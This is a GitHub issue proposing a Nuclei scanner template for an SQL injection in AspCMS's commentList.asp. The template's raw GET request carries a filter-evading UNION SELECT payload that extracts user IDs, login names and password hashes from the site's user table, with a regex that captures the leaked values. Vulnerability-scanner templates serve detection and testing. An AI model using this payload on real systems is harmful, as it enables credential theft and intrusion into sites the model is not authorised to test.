### ISSUE TITLE
AspCMS commentList.asp SQLI

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7968]
### Template Information:

AspCMS commentList.asp SQLI
app="ASPCMS"

### Nuclei Template:

```yaml
id: aspcms-commentlist-sqli

info:
  name: aspcms-commentlist-sqli
  author: SleepingBag945
  severity: medium
  description: |
    AspCMS commentList.asp 存在SQL注入漏洞，攻击者通过漏洞可以获取管理员md5的密码
  metadata:
    fofa-query: app="ASPCMS"
  tags: sqli

http:
  - raw:
      - |
        GET /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user  HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

    extractors:
      - type: regex
        group: 1
        regex:
          - "<div class=\"line2\">(.*?)</div>"

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1,'clistbox') && contains(body_1,'UserID,GroupID,LoginName,Password')"
        condition: and

```
